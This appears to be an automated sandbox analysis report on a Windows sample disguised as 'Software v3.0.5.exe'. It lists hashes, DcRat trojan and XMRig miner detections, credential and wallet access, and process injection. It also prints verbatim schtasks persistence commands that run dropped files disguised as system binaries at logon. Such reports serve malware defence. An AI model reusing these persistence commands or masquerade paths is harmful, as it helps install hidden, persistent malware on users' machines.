Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
22-07-2021 22:46
Static task
static1
Behavioral task
behavioral1
Sample
Software v3.0.5.exe
Resource
win7v20210410
General
-
Target
Software v3.0.5.exe
-
Size
910KB
-
MD5
56d73f0b8c89094a9f0ad6277f042b3d
-
SHA1
6efe8b8257f030fdb63a069aad558b6282310a31
-
SHA256
c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
-
SHA512
6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat \fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\MSOCache\All Users\dwm.exe dcrat C:\MSOCache\All Users\dwm.exe dcrat -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/1492-152-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 9 IoCs
Processes:
Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.exedwm.exeservices64.exeservices32.exesihost64.exesihost32.exepid process 836 Dcr.exe 1228 etc.exe 1948 xmr.exe 576 fonthostSvcIntodhcp.exe 1520 dwm.exe 1796 services64.exe 1932 services32.exe 920 sihost64.exe 948 sihost32.exe -
Loads dropped DLL 8 IoCs
Processes:
Software v3.0.5.execmd.exexmr.exeetc.exeservices64.exeservices32.exepid process 1100 Software v3.0.5.exe 1100 Software v3.0.5.exe 1100 Software v3.0.5.exe 340 cmd.exe 1948 xmr.exe 1228 etc.exe 1796 services64.exe 1932 services32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ipinfo.io 8 ipinfo.io -
Drops file in System32 directory 7 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\SysWOW64\KBDROST\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228 fonthostSvcIntodhcp.exe File created C:\Windows\System32\C_866\taskhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\C_866\b75386f1303e64d8139363b71e44ac16341adf4e fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\nci\WMIADAP.exe fonthostSvcIntodhcp.exe File opened for modification C:\Windows\System32\wbem\nci\WMIADAP.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\nci\75a57c1bdf437c0c81ad56e81f43c7323ed35745 fonthostSvcIntodhcp.exe File created C:\Windows\SysWOW64\KBDROST\cmd.exe fonthostSvcIntodhcp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 1796 set thread context of 1492 1796 services64.exe explorer.exe -
Drops file in Windows directory 2 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 fonthostSvcIntodhcp.exe File created C:\Windows\twain_32\explorer.exe fonthostSvcIntodhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1940 schtasks.exe 1568 schtasks.exe 1456 schtasks.exe 1804 schtasks.exe 1712 schtasks.exe 512 schtasks.exe 1424 schtasks.exe 1768 schtasks.exe 1092 schtasks.exe 1580 schtasks.exe -
Processes:
services32.exeservices64.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C services32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 services32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
fonthostSvcIntodhcp.exedwm.exexmr.exeetc.exeservices64.exeservices32.exepid process 576 fonthostSvcIntodhcp.exe 1520 dwm.exe 1520 dwm.exe 1948 xmr.exe 1228 etc.exe 1796 services64.exe 1932 services32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
dwm.exepid process 1520 dwm.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
fonthostSvcIntodhcp.exedwm.exexmr.exeetc.exeservices64.exeservices32.exeexplorer.exedescription pid process Token: SeDebugPrivilege 576 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 1520 dwm.exe Token: SeDebugPrivilege 1948 xmr.exe Token: SeDebugPrivilege 1228 etc.exe Token: SeDebugPrivilege 1796 services64.exe Token: SeDebugPrivilege 1932 services32.exe Token: SeLockMemoryPrivilege 1492 explorer.exe Token: SeLockMemoryPrivilege 1492 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exexmr.exeetc.execmd.execmd.exeservices32.exedescription pid process target process PID 1100 wrote to memory of 836 1100 Software v3.0.5.exe Dcr.exe PID 1100 wrote to memory of 836 1100 Software v3.0.5.exe Dcr.exe PID 1100 wrote to memory of 836 1100 Software v3.0.5.exe Dcr.exe PID 1100 wrote to memory of 836 1100 Software v3.0.5.exe Dcr.exe PID 1100 wrote to memory of 1228 1100 Software v3.0.5.exe etc.exe PID 1100 wrote to memory of 1228 1100 Software v3.0.5.exe etc.exe PID 1100 wrote to memory of 1228 1100 Software v3.0.5.exe etc.exe PID 1100 wrote to memory of 1228 1100 Software v3.0.5.exe etc.exe PID 1100 wrote to memory of 1948 1100 Software v3.0.5.exe xmr.exe PID 1100 wrote to memory of 1948 1100 Software v3.0.5.exe xmr.exe PID 1100 wrote to memory of 1948 1100 Software v3.0.5.exe xmr.exe PID 1100 wrote to memory of 1948 1100 Software v3.0.5.exe xmr.exe PID 836 wrote to memory of 1684 836 Dcr.exe WScript.exe PID 836 wrote to memory of 1684 836 Dcr.exe WScript.exe PID 836 wrote to memory of 1684 836 Dcr.exe WScript.exe PID 836 wrote to memory of 1684 836 Dcr.exe WScript.exe PID 1684 wrote to memory of 340 1684 WScript.exe cmd.exe PID 1684 wrote to memory of 340 1684 WScript.exe cmd.exe PID 1684 wrote to memory of 340 1684 WScript.exe cmd.exe PID 1684 wrote to memory of 340 1684 WScript.exe cmd.exe PID 340 wrote to memory of 576 340 cmd.exe fonthostSvcIntodhcp.exe PID 340 wrote to memory of 576 340 cmd.exe fonthostSvcIntodhcp.exe PID 340 wrote to memory of 576 340 cmd.exe fonthostSvcIntodhcp.exe PID 340 wrote to memory of 576 340 cmd.exe fonthostSvcIntodhcp.exe PID 576 wrote to memory of 1768 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1768 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1768 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1092 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1092 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1092 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1940 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1940 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1940 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1580 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1580 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1580 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1804 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1804 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1804 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1568 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1568 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1568 576 fonthostSvcIntodhcp.exe schtasks.exe PID 576 wrote to memory of 1520 576 fonthostSvcIntodhcp.exe dwm.exe PID 576 wrote to memory of 1520 576 fonthostSvcIntodhcp.exe dwm.exe PID 576 wrote to memory of 1520 576 fonthostSvcIntodhcp.exe dwm.exe PID 1948 wrote to memory of 1844 1948 xmr.exe cmd.exe PID 1948 wrote to memory of 1844 1948 xmr.exe cmd.exe PID 1948 wrote to memory of 1844 1948 xmr.exe cmd.exe PID 1228 wrote to memory of 1836 1228 etc.exe cmd.exe PID 1228 wrote to memory of 1836 1228 etc.exe cmd.exe PID 1228 wrote to memory of 1836 1228 etc.exe cmd.exe PID 1844 wrote to memory of 1712 1844 cmd.exe schtasks.exe PID 1844 wrote to memory of 1712 1844 cmd.exe schtasks.exe PID 1844 wrote to memory of 1712 1844 cmd.exe schtasks.exe PID 1836 wrote to memory of 1456 1836 cmd.exe schtasks.exe PID 1836 wrote to memory of 1456 1836 cmd.exe schtasks.exe PID 1836 wrote to memory of 1456 1836 cmd.exe schtasks.exe PID 1948 wrote to memory of 1796 1948 xmr.exe services64.exe PID 1948 wrote to memory of 1796 1948 xmr.exe services64.exe PID 1948 wrote to memory of 1796 1948 xmr.exe services64.exe PID 1228 wrote to memory of 1932 1228 etc.exe services32.exe PID 1228 wrote to memory of 1932 1228 etc.exe services32.exe PID 1228 wrote to memory of 1932 1228 etc.exe services32.exe PID 1932 wrote to memory of 1836 1932 services32.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Dcr.exeC:\Users\Admin\AppData\Roaming\Dcr.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\fonthostSvc\fonthostSvcIntodhcp.exe"C:\fonthostSvc\fonthostSvcIntodhcp.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\System32\wbem\nci\WMIADAP.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDROST\cmd.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_866\taskhost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
